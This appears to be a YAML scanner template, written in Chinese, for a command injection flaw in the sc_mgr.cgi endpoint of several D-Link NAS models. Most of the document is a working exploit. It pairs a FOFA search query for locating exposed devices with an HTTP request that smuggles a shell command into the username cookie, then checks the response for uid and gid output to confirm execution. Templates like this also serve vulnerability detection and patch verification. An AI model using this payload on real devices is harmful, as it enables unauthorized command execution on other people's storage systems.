product: D-Link
vName: D-Link多款产品sc_mgr.cgi接口远程命令执行
type: 命令执行
vID: [ ]
level: 3
vDesc: D-Link DNS-320等都是中国友讯（D-Link）公司的一款NAS（网络附属存储）设备。D-Link多款产品存在安全漏洞，该漏洞源于对参数name的错误操作会导致操作系统命令注入。以下产品及版本受到影响：D-Link DNS-320、DNS-320LW、DNS-325和DNS-340L 20241028版本及之前版本。
version: ''
note: ''
search:
  FOFA: body="/cgi-bin/login_mgr.cgi" && body="cmd=cgi_get_ssl_info"
protocol: http
link: https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247487857&idx=1&sn=6c19cce2a96593609bc7ac4d28ad17b5&chksm=974b9c76a03c156042e66b1eb27c1da8b4a245843f6bec3d6e8920f0dab695549bc17b0a28b0&scene=178&cur_album_id=2873032428486115330#rd
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info
      cookie: username=e10adc3949ba59abbe56e057f20f883e'& id & echo 'e10adc3949ba59abbe56e057f20f883e
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
              - uid=
              - gid=
            logic: 'and'